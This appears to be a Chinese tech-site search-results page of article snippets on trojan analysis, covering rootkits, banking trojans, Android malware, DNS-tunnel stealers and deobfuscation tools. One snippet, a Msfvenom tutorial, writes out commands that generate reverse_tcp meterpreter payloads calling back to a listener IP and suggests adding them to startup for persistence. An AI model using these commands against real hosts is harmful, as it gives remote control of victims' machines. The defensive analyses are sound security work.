首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

Linux内核级木马与病毒攻防:基础工具介绍

要想完成一项复杂的任务,工具的作用至关重要。要想在Linux系统上开发或研究木马病毒等特殊程序,我们需要使用一系列强大的开发和调试攻击。本节先介绍几种在Linux系统上极为强大的工具。...我们后面开发代码或调试分析其他病毒或木马的设计模式和原理时,必须使用gdb作为手术刀,对要研究的病毒和木马进行”剖尸检验“,通过gdb调查木马或病毒的代码设计方法,同时也使用gdb加载恶意代码,研究其运转流程...第二个是objdump,它的作用是将恶意代码所编制成的可执行文件内部信息抽取出来,例如如果病毒或木马最后编译成ELF格式的可执行文件,那么我们可以使用该工具将里面的各种信息展示出来,举个例子,使用C语言写一个...如果要分析ELF可执行文件格式内容,一个必不可免的工具为readelf,它能有效读取elf文件内各种关键信息。该工具在后续章节中将会被大量使用。几个常用方法为: readelf - S ....同时文件/proc/kcore对应内核符号表,利用gdb加载该文件就可以对内核进行调试和分析

1.5K10
您找到你想要的搜索结果了吗?
是的
没有找到

分析过程:服务器被黑安装Linux RootKit木马

分析 1.通过逆向分析,发现该恶意样本是一个Linux RootKit木马程序,样本参考了2018年H2HC(Hackers 2 Hackers Conference)会议上Matveychikov...木马数据,如下所示: 4.笔者自己编写了一个简单的解密程序,用于解密上面的Linux RootKit木马数据,如下所示: 5.解密Linux RootKit木马数据之后,如下所示: 6.通过逆向分析解密出来的...,例如使用bpf-hookdetect、Hades、ebpfkit-monitor、bpftool等工具进行简单的猎捕工作,同时可以使用IDA\Ghidra的eBPF逆向分析插件、readelf、llvm-objdump...等工具进行相关的逆向分析工作。...笔者一直从事与恶意软件威胁情报等相关安全分析与研究工作,包含挖矿、勒索、远控后门、僵尸网络、加载器、APT攻击样本、CS木马、Rootkit后门木马等,涉及到多种平台(Windows/Linux/Mac

1.5K50

Mispadu银行木马分析

写在前面的话 近期,研究人员观察到了大量网络诈骗活动,通过分析之后,很多线索直指URSA/Mispadu银行木马,趋势科技将该木马标记为了TrojanSpy.Win32.MISPADU.THIADBO。...研究人员表示,Mispadu银行木马能够在感染目标用户系统之后,窃取用户的凭证信息。...木马活动分析 针对Mispadu的攻击目标,Mispadu的入口向量为垃圾邮件,这跟很多其他的恶意软件活动非常相似。...代码中还包含两个合法工具,即NirSoft旗下的WebBrowserPassView和Mail PassView,这两款工具的功能就是收集用户的数据。...木马病毒是网络犯罪分子用来窃取银行系统用户凭证的工具之一,而垃圾邮件就是这些恶意软件最主要的传播途径。

34310

Android木马分析简介

本文介绍基于Android的手机恶意软件,是一个基础性的介绍,给新入门的人提供一个分析工具指引。...要分析木马是一个2013年的syssecApp.apk,这个木马分析能对Android恶意软件有个大概了解。...基础: 1 –Android应用基础 Android是google开发基于Linux内核的开源的手机操作系统,应用程序使用JAVA语言编写并转换成了Dalvik虚拟机,而虚拟机则提供了一个抽象的真实硬件...应用则需要Linux的用户和组来执行,所以目前所有的恶意软件都需要获得权限。...2 –分析工具 2.1Dexter Dexter可以将Android应用上传做分析,提供了包和应用元数据的介绍。包的依赖关系图显示了所有包的关系,可以快速打开列表显示所有的class和功能。

1.5K90

木马病毒分析

一、病毒简介这款木马从恶意网址下载东西,然后修改本地文件;SHA256:4354970ccc7cd6bb16318f132c34f6a1b3d5c2ea7ff53e1c9271905527f2db07MD5...:56b2c3810dba2e939a8bb9fa36d3cf96SHA1:99ee31cd4b0d6a4b62779da36e0eeecdd80589fc二、行为分析首先看看微步云沙箱分析:恶意服务器网址...三、静态分析首先查壳:通过x32dbg脱壳:看到pushad,直接esp大法或者ctrl+f搜索popad,选择第一个:走到ret,进入OEP脱壳:注意一下OEP这里:接下来拖到IDA中,根据之前OEP...当然这次没有细致分析,大概知道病毒都是下载文件,然后遍历目录筛选后缀exe和rar的程序进行写入,因为是静态分析,所以细致东西并没有发现,下次会结合动态分析更加详细的分析一次。

39750

黑客常用的木马工具

大家经常会听到“木马”一词。究竟木马是什么东西呢?这篇文章里我会向大家介绍“特洛伊木马”、“特洛伊木马”的使用以及特洛伊木马的防范等。 木马,全称为:特洛伊木马(Trojan Horse)。...而木马里面却藏着最强悍的勇士!最后等时间一到,木马里的勇士全部冲出来把敌人打败了! 这就是后来有名的“木马计”。—— 把预谋的功能隐藏在公开的功能里,掩饰真正的企图。...特洛伊木马程序的发展历史: 第一代木马:控制端 —— 连接 —— 服务端 特点:属于被动型木马。能上传,下载,修改注册表,得到内存密码等。...典型木马:冰河,NetSpy,back orifice(简称:BO)等。 第二代木马:服务端 —— 连接 —— 控制端 特点:属于主动型木马。...(反弹端口型木马) 下面,我们将介绍一个国产的特洛伊木马 —— 冰河。

1.5K30

Linux 性能分析工具 nmon for Linux

将数据保存到一个逗号分隔的文件以供分析,并进行长时间数据捕捉 配合使用 nmon Excel 2000 电子表格分析器,该分析器能够加载 nmon 输出文件并自动为你创建几十个图形,你可以基于这些图形研究或填写性能报告...下载源码编译 - 点击 编译 nmon 数据分析 保存好 nmon 数据以后,你可以使用以下几种工具之一来对其进行分析并生成统计图。...下载 nmon Excel 电子表格分析器 这个比较原始工具多年前由 Stephen Atkins 研发 你可以通过性能工具论坛请求支持 Linux 用户可能并不喜欢使用微软电子表格的想法,他们很难自动生成图形...nmon2rrd 一个微软免费工具 这个工具使用 rrdtool 生成所有图形和一个网站 .html 文件 从 nmon for AIX Wiki 下载 nmon2rrd 这个工具支持多台机器的自动分析...,可以通过一个浏览器对分析情况进行查看 现在 - 开源了 nmon for Linux 是一个单一的 5000 行代码的源码文件和单一的 makefile。

6.8K60

来自云端的木马:“百家”木马集团分析

4)该数据库是SQL Server数据库,得到地址、用户名、密码等信息后可直接连接数据库,我们震惊地发现,数据库中存储了多达67种配置,经分析,大多为功能独立的木马,也就是说,根据不同的ID,可能执行的木马多达...5)经过对木马行为的分析,结合数据库中的实际数据,我们得知配置中的比较重要的字段的意义,将其列举如下: 配置字段 功能 id 木马id jm 解密密钥 daxiao 文件大小 fanghi 要创建的傀儡进程...2、PlayLoad分析木马根据不同的id,可以下载执行多大60多中不同的PlayLoad,经抽样分析,这些不同的PlayLoad大多为Gh0st远程控制木马,每个木马的有着不同的C&C服务器,应该是不同的使用者所使用...0×03后记: 经过对木马加载器的详细分析和配置信息的猜测解读,做出如下图猜测,木马作者负责木马的免杀(同一个文件),并通过SQL Server上的配置信息来管理和销售木马,每卖出一个木马作者便为牧马人开立一个帐号...经过大量的分析测试,我们发现该木马文件在国内多个安全厂商的白名单中,因为改变文件内容的任意一个字节都会导致木马不被信任,而任意修改文件名,则不影响白名单信任。

1.3K70

Banjori银行木马分析报告

样本综述 Banjori是被发现于2013年并活跃至今的银行木马。其攻击目标主要针对于法国、德国与美国的个人银行网上用户。...当用户被感染后,木马会将恶意载荷注入至用户的活动进程实现持久威胁并对用户的信息进行收集。银行木马的盗窃重灾区多位于浏览器,Banjori亦不能免俗。...相比IE与Chrome, 该木马尤为青睐于火狐浏览器,大部分被窃取的用户信息均通过对该浏览器的挂钩、数据库文件查询获取。...值得一提的,该木马家族自2013年起就使用当年颇为时髦的动态域名算法获取CC服务器地址。这导致杀软传统的黑名单过滤形同虚设,但同时也为摧毁/接管该僵尸网络创造了条件。...样本细节分析 1持久威胁 第一与第二阶段的恶意代码循环判断互斥体’JbrDelete’是否被创建,当该互斥体未被创建时,持续检索、注入未被感染的活动进程。 ? 第二阶段的恶意代码会创建一个隐藏窗口。

1.3K10

“DNS隧道”盗号木马分析

盗号木马相信大家都不陌生。随着网络越来越普及,网上的账号密码越来越重要,盗号木马的生命力也就越发的顽强了。 随着与杀毒软件的对抗,盗号木马也在不断的更新换代。...QQ粘虫就是一个很典型的例子,这类木马的特点可以参考我们之前写过的博文《“神奇”的qq粘虫之旅》。...你的QQ号和密码这些隐私数据正在木马指令的授意下,被你自己不惜高价买下的高性能CPU和内存飞速的进行着编码,并最终由你所钟爱的那块网卡发送到盗号者的服务器上……这绝对会是一个忧伤的故事…… 但木马的编码过程却颇费周章...这么麻烦,当然是为了绕过各种检测和分析系统,但同时还有一个目的——盗号者需要加密后的结果依然保持所有字符必须只有字母和数字组成(理论上还可以有连字符)。...这是为了给这个木马最关键的一步做好铺垫——以DNS查询的形式将账号信息发送出去! 木马在内存中将加密后的字符串,前面拼上”www.”,后面拼上”.cn”,得到了一个根本不存在的域名。

1.2K100

逆向分析“海莲花” APT木马的花指令反混淆工具

本文中,CheckPoint研究人员基于对“海莲花” 木马程序的分析,编写了一段绕过其混淆技术的反混淆工具-APT32GraphDeobfuscator.py,在逆向分析过程中,利用该工具,最终可以消除混淆指令...,清晰地显示出“海莲花” 木马的运行调用流程,对木马分析和相关安全研究人员有借鉴帮助之用。...经多个测试分析案例可见,“海莲花” 组织利用的木马程序和相关工具都经过了复杂的混淆编码,为了阻止或迷惑逆向分析人员,在其中添加了各种“障眼”的混淆技术,经验老道。...该反混淆工具需要基于开源逆向分析工具radare2的界面框架 Cutter,Cutter是跨平台工具,目的就是以界面方式直观友好地显示 radare2的分析原理。...(想查看该工具,请直接到以下“反混淆脚本”部份) 下载安装 Cutter 大家可以选择从这里下载最新版本的Cutter,如果你用的是Linux系统,可以使用应用镜像方式下载安装。

1.5K10

Linux 性能分析工具汇总

本文档主要是结合Linux 大牛,搜集Linux系统性能优化相关文章整理后的一篇综合性文章,主要是结合博文对涉及到的原理和性能测试的工具展开说明。 背景知识:具备背景知识是分析性能问题时需要了解的。...常用的性能测试工具 熟练并精通了第二部分的性能分析命令工具,引入几个性能测试的工具,介绍之前先简单了解几个性能测试工具: perf_events:一款随 Linux 内核代码一同发布和维护的性能诊断工具...perf-tools:一款基于 perf_events (perf) 和 ftrace 的Linux性能分析调优工具集。Perf-Tools 依赖库少,使用简单。...支持Linux 3.2 及以上内核版本。 bcc(BPF Compiler Collection)::一款使用 eBP F的 perf 性能分析工具。...Linux observability sar | linux性能观测工具 sar(System Activity Reporter系统活动情况报告)是目前LINUX上最为全面的系统性能分析工具之一,

1.2K20

相册类木马专题分析

安全研究人员针对这系列的木马,进行了相关的分析及追踪。...木马技术原理分析 3.1 防卸载技术 3.1.1 隐藏图标 木马运行之后隐藏图标,之后木马后再后台私自运行,同时诱导用户激活设备管理器,防止用户发现和卸载,具有一定的隐蔽性。...图 3-5 伪造虚假卸载 3.2 木马状态报送 该木马会实际监控木马的状态,在用户启动木马,激活设备管理器、卸载等操作时,会随时通过短信的方式通报黑客,黑客手机号码为13*61。...4.3 传播地址统计分析 2016年全年总共监测到2万伪装相册类窃密软件,对所有传播地址域名进行分析统计,其中TOP10域名如下表所示。...Android样本提取信息并进行关联分析和检测。

1.4K60

工具的使用 | Msfvenonm生成木马

目录 Msfvenom 生成exe木马 在前一篇文章中我讲了什么是Meterpreter,并且讲解了Meterpreter的用法。...传送门——>Metasploit之Meterpreter 今天我要讲的是我们用Msfvenom制作一个木马,发送给其他主机,只要其他主机运行了该木马,就会自动连接到我们的主机,并且建立一条TCP连接。...msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.10.27 LPORT=8888 -o ~/Desktop/test2.apk Linux...: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.10.27 LPORT=8888 -f elf > shell.elf...如图,我们成功拿到了其他主机的shell 对于这个木马,如果我们在获取到某主机的shell后,想要在目标主机建立持续性的后门,我们可以将该木马放到目标主机的开机启动项中,那样,只要该主机启动后,我们就可以连接到该主机了

1.4K10

Windows病毒和木马排查工具

工控系统越来越多被病毒软件和恶意木马攻击,造成很多工控系统运行缓慢,表现症状为操作缓慢,画面切换卡顿,历史曲线和操作面板调用卡顿,检查windows操作系统时候发现cpu并不是很高,内存占用也不多,但硬盘读写很疯狂...今天剑工提供一个windows脚本工具,用来帮助工控用户检查windows系统关键项是否异常,脚本工具叫:windows check tools,文件名wct.bat 首先下载wct.bat到c盘根目录下...最后查看application/system/security三项的事件记录,可以根据时间查看事件的顺序的内容 以上通过此脚本工具可以快速排查病毒/木马对windows系统的入侵。...对于如何安全清除这些木马和病毒,欢迎大家加入剑指工控技术群获取离线清除工具(不同的工控系统需要采用不同的清除工具,防止清除工具对工控系统产生不必要的删除和隔离)

69110
领券